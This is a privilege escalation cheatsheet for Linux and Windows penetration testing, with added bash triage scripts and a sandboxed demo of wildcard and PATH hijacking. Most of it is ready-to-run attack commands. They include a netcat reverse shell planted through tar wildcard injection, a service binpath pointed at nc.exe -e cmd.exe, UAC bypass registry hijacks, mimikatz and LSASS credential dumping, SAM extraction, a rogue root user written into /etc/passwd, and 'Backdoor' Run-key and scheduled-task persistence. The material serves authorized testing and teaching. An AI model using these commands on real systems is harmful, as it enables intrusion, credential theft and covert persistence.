Privilege Escalation Cheatsheet

Complete guide to privilege escalation techniques for Linux and Windows. Commands, exploits and methodologies for penetration testing.

Disclaimer

Only use these techniques on systems you have explicit authorization to test. Unauthorized access and privilege escalation are illegal and may result in serious legal consequences.

Useful Command Combinations

Linux Full Enum
Complete Linux system enumeration
uname -a; cat /etc/issue; id; sudo -l; getcap -r / 2>/dev/null; find / -perm -4000 -type f 2>/dev/null
SUID Quick Search
Quick search for interesting SUID binaries
find / -perm -4000 -type f -exec ls -la {} + 2>/dev/null
Windows Full Enum
Complete Windows system enumeration
systeminfo & whoami /all & net user & net localgroup administrators & sc query state= all
Service Exploit Check
Auto-start services with unquoted binary paths outside C:\Windows (unquoted service path check)
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Password Hunting Linux
Search passwords and credentials on Linux
grep -ri "passw" /home/ 2>/dev/null; grep -i passw ~/.bash_history; env | grep -i pass
Password Hunting Windows
Search passwords and credentials on Windows
findstr /si password *.txt *.xml *.ini *.config & reg query HKLM /f password /t REG_SZ /s

Linux System Enumeration

uname -a
Kernel and system info
uname -a
cat /etc/issue
Linux distribution
cat /etc/issue
cat /etc/*-release
OS version info
cat /etc/*-release
hostname
Host name
hostname
id
Current user info
id
whoami
Current username
whoami
w
Logged users
w
cat /etc/passwd
Users with a login shell
grep -v -e nologin -e /bin/false /etc/passwd

Sudo & Permissions

sudo -l
Available sudo commands
sudo -l
sudo -i
Interactive root shell
sudo -i
sudo -s
Shell with sudo privileges
sudo -s
sudo su -
Switch to root
sudo su -
cat /etc/sudoers
Sudoers configuration
cat /etc/sudoers
sudo LD_PRELOAD
LD_PRELOAD exploit (only works when the sudoers Defaults line of sudo -l shows env_keep+=LD_PRELOAD)
sudo LD_PRELOAD=/tmp/evil.so program
sudo python -c
Python shell with sudo
sudo python -c 'import os;os.system("/bin/bash")'
GTFOBins
Search sudo exploitable binaries
https://gtfobins.github.io/

SUID/SGID Binaries

find SUID
Find SUID files
find / -perm -4000 -type f 2>/dev/null
find SGID
Find SGID files
find / -perm -2000 -type f 2>/dev/null
find SUID+SGID
Find SUID and SGID
find / -perm -6000 -type f 2>/dev/null
find writable
Writable files non-root
find / -writable -type f 2>/dev/null | grep -v proc
nmap SUID
Exploit nmap interactive mode (only nmap 2.02 to 5.21 ship --interactive)
nmap --interactive; !sh
vim SUID
Exploit SUID vim/vi (bash drops the effective uid unless started with -p)
vim -c ':!/bin/bash -p'
cp SUID
Add a root user with SUID cp (edit a copy, then write it back over /etc/passwd)
cp /etc/passwd /tmp/passwd && echo "root2:$(openssl passwd -1 -salt x pass123):0:0:root:/root:/bin/bash" >> /tmp/passwd && cp /tmp/passwd /etc/passwd && su root2
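Worked example, added here and not part of the original cheatsheet: a bash triage for the two listings the Sudo and SUID sections tell you to collect. It hides SUID binaries that are present on a stock install so the unusual ones stand out, marks names that have a GTFOBins entry, and for `sudo -l` output flags NOPASSWD rules, `ALL` rules and an `env_keep+=LD_PRELOAD` default. The GTFOBins shortlist and the SUID baseline are hand-picked subsets (my assumption, not the full catalogue), and both sample outputs are constructed, not taken from a real host.

```bash
#!/usr/bin/env bash
# Added example: offline triage of `sudo -l` and SUID listings.
# Lists below are hand-picked subsets (assumption), not the complete GTFOBins catalogue.

# GTFOBins entries that yield a shell via sudo or SUID (subset).
GTFO_SHELL_BINS="apt apt-get awk bash busybox cp env find less more nano nmap perl php python python3 sh systemctl tar vi vim zsh"
# SUID binaries present on most stock distros; hidden so the unusual ones stand out.
SUID_BASELINE="chfn chsh fusermount gpasswd mount newgrp passwd pkexec ping su sudo umount"

in_list() { case " $2 " in *" $1 "*) return 0 ;; esac; return 1; }   # in_list WORD "w1 w2 ..."

# triage_suid < paths   (output of: find / -perm -4000 -type f 2>/dev/null)
triage_suid() {
  while IFS= read -r path; do
    [ -n "$path" ] || continue
    name=${path##*/}
    in_list "$name" "$SUID_BASELINE" && continue
    if in_list "$name" "$GTFO_SHELL_BINS"; then
      echo "GTFOBINS $path"       # look up the SUID section for this name on gtfobins.github.io
    else
      echo "UNUSUAL  $path"       # custom binary: check for relative exec() calls, PATH use, writable config
    fi
  done
  return 0
}

# triage_sudo < output of `sudo -l`
triage_sudo() {
  while IFS= read -r raw; do
    line=$(printf '%s' "$raw" | sed 's/^[[:space:]]*//')
    case "$line" in
      *env_keep*LD_PRELOAD*) echo "ENVKEEP  LD_PRELOAD kept: sudo LD_PRELOAD=/tmp/evil.so <allowed cmd>"; continue ;;
      "("*) ;;                                   # a rule line: (runas) [TAG:] cmd, cmd
      *) continue ;;
    esac
    tag=PASSWD
    case "$line" in *NOPASSWD:*) tag=NOPASSWD ;; esac
    cmds=$(printf '%s' "${line#*") "}" | sed 's/^\([A-Z]*: *\)*//')   # drop "(root) NOPASSWD: "
    printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
      cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//')
      first=${cmd%% *}
      name=${first##*/}
      if [ "$first" = ALL ]; then
        echo "$tag FULLROOT $cmd"                # sudo -i / sudo su - works directly
      elif in_list "$name" "$GTFO_SHELL_BINS"; then
        echo "$tag GTFOBINS $cmd"                # sudo section of the GTFOBins entry
      else
        echo "$tag -        $cmd"                # read the script/binary: writable? relative paths?
      fi
    done
  done
  return 0
}

# Constructed sample output of `sudo -l` (not from a real host).
SAMPLE_SUDO='Matching Defaults entries for low on target:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/bin:/usr/bin:/bin

User low may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim, /usr/local/bin/backup.sh
    (ALL) /usr/bin/apt-get'

# Constructed sample SUID listing.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python3
/usr/local/bin/backup_helper
/usr/bin/mount'

printf '%s\n' "$SAMPLE_SUDO" | triage_sudo
printf '%s\n' "$SAMPLE_SUID" | triage_suid
```

On a target, feed it the real output (`sudo -l | triage_sudo`, `find / -perm -4000 -type f 2>/dev/null | triage_suid`); anything tagged GTFOBINS has a documented one-liner, anything tagged UNUSUAL or `-` needs manual review of the binary or script.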

Linux Capabilities

getcap
List capabilities
getcap -r / 2>/dev/null
getcap binary
Check capabilities
getcap /usr/bin/python3.8
CAP_SETUID
Python CAP_SETUID exploit
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
CAP_DAC_READ_SEARCH
Read privileged files
tar -czvf /tmp/shadow.tar.gz /etc/shadow
setcap
Set capability (requires root; useful for persistence once escalated, not for the initial escalation)
setcap cap_setuid+ep /usr/bin/python3
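Worked example, added here and not from the original page: a parser for `getcap -r / 2>/dev/null` output that flags the capabilities which lead to root and prints a short hint for each. It accepts both print styles of libcap (`path = cap_x+ep` before 2.41, `path cap_x=ep` from 2.41 on) and treats a bare `=ep` as "all capabilities". The set of dangerous capabilities and the hints are my selection (assumption); the sample output is constructed. Paths containing spaces are not handled.

```bash
#!/usr/bin/env bash
# Added example: triage getcap output. Handles both libcap print styles:
#   libcap < 2.41:  /usr/bin/python3.8 = cap_setuid+ep
#   libcap >= 2.41: /usr/bin/python3.8 cap_setuid=ep
# DANGEROUS_CAPS is my selection (assumption), not an authoritative list.

DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_read_search cap_dac_override cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module"

in_list() { case " $2 " in *" $1 "*) return 0 ;; esac; return 1; }

cap_hint() {   # one-line pointer per dangerous capability
  case "$1" in
    cap_setuid)          echo 'setuid(0) then spawn a shell (see the CAP_SETUID python entry)' ;;
    cap_setgid)          echo 'setgid(0): act as group root, combine with group-writable root files' ;;
    cap_dac_read_search) echo 'read checks bypassed: copy /etc/shadow or root SSH keys with this binary' ;;
    cap_dac_override)    echo 'write checks bypassed: append a root user to /etc/passwd with this binary' ;;
    cap_chown)           echo 'chown /etc/passwd or /etc/shadow to yourself, then edit' ;;
    cap_fowner)          echo 'chmod root-owned files, e.g. make /etc/passwd writable' ;;
    cap_sys_admin)       echo 'mount and namespace abuse, effectively root' ;;
    cap_sys_ptrace)      echo 'attach to a root process and inject code' ;;
    cap_sys_module)      echo 'load a kernel module: kernel-level code execution' ;;
    *)                   echo 'see capabilities(7)' ;;
  esac
}

# triage_caps < getcap output
triage_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}
    rest=${line#* }
    rest=${rest#"= "}                          # strip old-style "= " prefix
    printf '%s\n' "$rest" | tr ',' '\n' | while IFS= read -r tok; do
      cap=${tok%%[+=]*}                        # cap_setuid+ep / cap_setuid=ep -> cap_setuid
      flags=${tok#"$cap"}
      if [ -z "$cap" ]; then
        echo "CRITICAL $path has ALL capabilities ($tok)"
      elif in_list "$cap" "$DANGEROUS_CAPS"; then
        echo "PRIVESC  $path $cap$flags: $(cap_hint "$cap")"
      else
        echo "info     $path $cap$flags"
      fi
    done
  done
  return 0
}

# Constructed sample getcap output mixing both print styles (not from a real host).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/capsh cap_net_admin,cap_sys_ptrace=ep
/opt/agent/agent =ep'

printf '%s\n' "$SAMPLE_GETCAP" | triage_caps
```

Usage on a target: `getcap -r / 2>/dev/null | triage_caps`. The `+ep`/`=ep` flags matter: a capability that is only inheritable (`+i`) is not usable by the binary itself.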

Cron Jobs

crontab -l
User cron jobs
crontab -l
cat /etc/crontab
System crontab
cat /etc/crontab
ls cron.d
Cron.d directory
ls -la /etc/cron.d/
cat cron.*
Periodic cron jobs
cat /etc/cron.daily/* /etc/cron.hourly/*
pspy
Monitor processes
./pspy64 -pf -i 1000
writable cron
Find writable cron jobs
find /etc/cron* -type f -writable 2>/dev/null

Services & Processes

ps aux
Active processes
ps aux | grep root
ps -ef
Full process list
ps -ef | grep -v \[
systemctl
Systemd services
systemctl list-units --type=service
netstat
Listening ports
netstat -tulpn | grep LISTEN
ss -tulpn
Socket statistics
ss -tulpn
service --status-all
Services status
service --status-all

Kernel Exploits

uname -r
Kernel version
uname -r
searchsploit
Search kernel exploits
searchsploit linux kernel 4.15
DirtyCow
CVE-2016-5195
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty
linux-exploit-suggester
Suggest exploits
./linux-exploit-suggester.sh
LinEnum
Automated enumeration
./LinEnum.sh -t

Passwords & Credentials

cat /etc/shadow
Password hashes
cat /etc/shadow
unshadow
Combine passwd and shadow
unshadow /etc/passwd /etc/shadow > hashes.txt
john
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
history
Command history
cat ~/.bash_history | grep -i passw
find passwords
Search password files
grep -r "password" /home/ 2>/dev/null
env
Environment variables
env | grep -i pass
ssh keys
SSH keys
find / -name id_rsa 2>/dev/null

Wildcard & Path Injection

tar wildcard
Tar wildcard exploit
echo "mkfifo /tmp/f;nc IP PORT 0</tmp/f|/bin/sh>/tmp/f 2>&1;rm /tmp/f" > shell.sh && chmod +x shell.sh && touch -- --checkpoint=1 --checkpoint-action=exec=sh\ shell.sh
chown wildcard
Chown wildcard
touch -- --reference=/root/file.txt
PATH injection
Hijack PATH (create the fake binary first, then run the target; bash needs -p to keep euid 0)
printf '#!/bin/bash\n/bin/bash -p\n' > /tmp/ls && chmod +x /tmp/ls && export PATH=/tmp:$PATH
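Worked example, added here and not part of the original cheatsheet: the tar wildcard and PATH hijack entries above run end to end in a throwaway directory as the current user, each next to a hardened form, so you can see the injected command execute in one case and not in the other. The payloads only drop a marker file (constructed stand-ins for a reverse shell or `/bin/bash -p`). It assumes GNU tar (the `--checkpoint` options are GNU-specific) and a temp directory that allows execution.

```bash
#!/usr/bin/env bash
# Added example: wildcard injection and PATH hijack, vulnerable vs hardened, in a temp dir.
# Nothing here touches the real system; markers replace the real payloads.

# demo_tar_wildcard vulnerable|hardened -> prints EXECUTED or CLEAN
# Models a root cron job like:  cd /var/backups && tar czf /root/backup.tgz *
demo_tar_wildcard() {
  mode=$1
  work=$(mktemp -d) || return 1
  (
    cd "$work" || exit 1
    echo data > report.txt
    # Attacker-controlled files in the backed-up directory (constructed payload: marker file).
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$work" > shell.sh
    touch -- --checkpoint=1 "--checkpoint-action=exec=sh shell.sh"
    if [ "$mode" = vulnerable ]; then
      tar cf /dev/null * 2>/dev/null          # the shell expands the two filenames into tar options
    else
      tar cf /dev/null -- ./* 2>/dev/null     # '--' and the './' prefix: names can no longer be options
    fi
  ) || true
  if [ -e "$work/pwned" ]; then echo EXECUTED; else echo CLEAN; fi
  rm -rf "$work"
  return 0
}

# demo_path_hijack vulnerable|hardened -> prints EXECUTED or CLEAN
# Models a privileged program that runs `ls` by name (system("ls ...")) versus one that
# resets PATH and calls /bin/ls by absolute path.
demo_path_hijack() {
  mode=$1
  work=$(mktemp -d) || return 1
  printf '#!/bin/sh\nls "$1" >/dev/null\n' > "$work/vuln_prog"
  printf '#!/bin/sh\nPATH=/usr/bin:/bin\n/bin/ls "$1" >/dev/null\n' > "$work/hard_prog"
  mkdir "$work/evil"
  # Fake `ls` placed first in PATH (constructed: marker file instead of `/bin/bash -p`).
  printf '#!/bin/sh\ntouch "%s/hijacked"\n' "$work" > "$work/evil/ls"
  chmod +x "$work/vuln_prog" "$work/hard_prog" "$work/evil/ls"
  if [ "$mode" = vulnerable ]; then
    PATH="$work/evil:$PATH" "$work/vuln_prog" "$work" || true
  else
    PATH="$work/evil:$PATH" "$work/hard_prog" "$work" || true
  fi
  if [ -e "$work/hijacked" ]; then echo EXECUTED; else echo CLEAN; fi
  rm -rf "$work"
  return 0
}

echo "tar wildcard: vulnerable=$(demo_tar_wildcard vulnerable) hardened=$(demo_tar_wildcard hardened)"
echo "PATH hijack:  vulnerable=$(demo_path_hijack vulnerable) hardened=$(demo_path_hijack hardened)"
```

The fix on the defensive side is the same in both cases: never let untrusted names reach an option parser (`--` and `./*`, or `find -print0 | tar --null -T -`), and never let a privileged program resolve commands through an attacker-influenced PATH. When the real target is a SUID binary, remember that bash resets the effective uid unless started with `-p`, which is why the page's PATH entry writes `/bin/bash -p` into the fake binary.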

Docker & Containers

docker group
Check docker group
groups | grep docker
docker privesc
Mount host filesystem
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker ps
Active containers
docker ps -a
docker images
Available images
docker images

Windows System Enumeration

systeminfo
System information
systeminfo
hostname
Computer name
hostname
whoami
Current user
whoami /all
net user
Users list
net user
net localgroup
Local groups
net localgroup administrators
netstat
Network connections
netstat -ano
ipconfig
Network configuration
ipconfig /all
route
Routing table
route print

Windows Services

sc query
Services list
sc query state= all
wmic service
WMIC service info
wmic service get name,pathname,startmode
icacls
File/dir permissions
icacls "C:\Program Files\Service"
accesschk
Check service permissions (repeat for "Authenticated Users" and "Users")
accesschk.exe -accepteula -uwcqv "Everyone" *
sc qc
Service config
sc qc VulnService
sc config
Modify service
sc config VulnService binpath= "C:\temp\nc.exe -nv IP PORT -e cmd.exe"
net start
Start service
net start VulnService
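Worked example, added here and not from the original page: the unquoted service path check done properly, offline, over `wmic service get name,pathname,startmode /format:csv` output copied from the target. The one-liner in the combinations section only excludes quoted paths and C:\Windows; this also requires a space in the executable path and prints the file names Windows tries first when CreateProcess splits the unquoted string at each space, which are the locations to test with `icacls`. The sample CSV is constructed. Real wmic CSV output is UTF-16LE with CRLF line endings, so run it through `iconv -f UTF-16LE -t UTF-8` before piping it in.

```bash
#!/usr/bin/env bash
# Added example: flag unquoted service paths from saved wmic CSV output and list the
# hijack candidates (CreateProcess tries "C:\Program.exe", "C:\Program Files\Vuln.exe", ...).

# find_unquoted_paths < wmic.csv  -> lines: Name|StartMode|ExePath|candidate1 candidate2 ...
find_unquoted_paths() {
  tr -d '\r' | awk -F',' '
    NR == 1 || NF < 4 { next }                                  # header or malformed line
    {
      name = $2; mode = $NF
      path = $3; for (i = 4; i < NF; i++) path = path "," $i   # PathName itself may contain commas
      if (substr(path, 1, 1) == "\"") next                      # quoted: not hijackable this way
      exe = path
      if (match(tolower(exe), /\.exe/)) exe = substr(exe, 1, RSTART + 3)   # drop arguments
      if (tolower(exe) ~ /^c:\\windows\\/) next                 # system dir: not writable by users
      if (exe !~ / /) next                                      # no space: only one interpretation
      n = split(exe, parts, " ")
      cands = ""; prefix = parts[1]
      for (i = 2; i <= n; i++) {                                # every prefix except the real path
        cands = cands (cands == "" ? "" : " ") prefix ".exe"
        prefix = prefix " " parts[i]
      }
      print name "|" mode "|" exe "|" cands
    }'
  return 0
}

# Constructed sample (not from a real host); format of: wmic service get name,pathname,startmode /format:csv
SAMPLE_WMIC_CSV='Node,Name,PathName,StartMode
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,VulnSvc,C:\Program Files\Vuln App\bin\service.exe -k svc,Auto
WS01,GoodSvc,"C:\Program Files\Good App\svc.exe" -k svc,Auto
WS01,ManualSvc,C:\Program Files\Manual App\svc.exe,Manual
WS01,NoSpaceSvc,C:\Tools\svc.exe,Auto'

printf '%s\n' "$SAMPLE_WMIC_CSV" | find_unquoted_paths
```

For each flagged service, check write access to the directory of a candidate (for `C:\Program Files\Vuln.exe` that is `icacls "C:\Program Files"`), drop the payload under that name, then restart the service (`sc stop`/`sc start`, which needs the permission `accesschk` reports) or wait for a reboot if StartMode is Auto.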

Registry & AutoRuns

reg query Run
AutoRun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query RunOnce
RunOnce registry
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query AlwaysInstallElevated
AlwaysInstallElevated check (must be 1 in both HKLM and HKCU before msiexec runs an MSI as SYSTEM)
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg add
Add registry key
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"

UAC Bypass

eventvwr.exe
EventVwr UAC bypass (mscfile handler hijack; fixed in later Windows 10 builds)
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe" /f && eventvwr.exe
fodhelper.exe
FodHelper UAC bypass (needs an empty DelegateExecute value next to the command)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f && fodhelper.exe
computerdefaults
ComputerDefaults bypass (same ms-settings handler as fodhelper)
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "powershell.exe" /f && computerdefaults.exe
UACMe
Automated bypass tool
Akagi64.exe 23

Token Manipulation

whoami /priv
Current privileges
whoami /priv
incognito
Meterpreter incognito
load incognito; list_tokens -u
impersonate_token
Impersonate token
impersonate_token "NT AUTHORITY\SYSTEM"
SeImpersonatePrivilege
Potato exploits (need SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege; JuicyPotato works up to Windows 10 1803 / Server 2016, use PrintSpoofer or RoguePotato on newer builds)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
PrintSpoofer
PrintSpoofer exploit
PrintSpoofer.exe -i -c cmd
RoguePotato
RoguePotato exploit (IP is your host running a redirector from port 135 back to the target on the -l port)
RoguePotato.exe -r IP -e "cmd.exe" -l 9999

Windows Passwords & Credentials

cmdkey
Saved credentials
cmdkey /list
findstr password
Search passwords in files
findstr /si password *.txt *.xml *.ini
reg query HKLM
Passwords in registry
reg query HKLM /f password /t REG_SZ /s
SAM dump
Extract SAM and SYSTEM hives (requires admin; extract and crack the hashes offline)
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive
mimikatz
Mimikatz dump
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
lsass dump
Dump LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
unattend.xml
Passwords in unattend
type C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml 2>nul

Exploits & CVE

wes.py
Windows Exploit Suggester
wes.py --update && wes.py systeminfo.txt
EternalBlue
MS17-010 (remote SMB exploit that lands as SYSTEM; not a local escalation)
use exploit/windows/smb/ms17_010_eternalblue
MS16-032
Secondary Logon Handle
Invoke-MS16032 -Command "cmd.exe"
MS15-051
Client Copy Image
ms15-051x64.exe "cmd.exe"
PrintNightmare
CVE-2021-1675 / CVE-2021-34527
Invoke-Nightmare -DLL \\IP\share\nightmare.dll

DLL Hijacking

procmon
Process Monitor
procmon.exe /AcceptEula /Quiet
PATH DLL
DLL search order
echo %PATH%
missing DLL
Find DLLs the target looks up but does not find (Process Monitor filter)
Procmon filter: Process Name is <target>, Result is NAME NOT FOUND, Path ends with .dll
icacls writable
Directories writable by Everyone or Users
icacls "C:\Program Files\App" | findstr /i "Everyone Users" | findstr "(M) (F) (W)"

Scheduled Tasks

schtasks
List scheduled tasks
schtasks /query /fo LIST /v
taskschd.msc
Task Scheduler GUI
taskschd.msc
icacls task
Task file permissions
icacls C:\Tasks\backup.bat
schtasks create
Create scheduled task
schtasks /create /tn Backdoor /tr "C:\backdoor.exe" /sc onstart /ru System
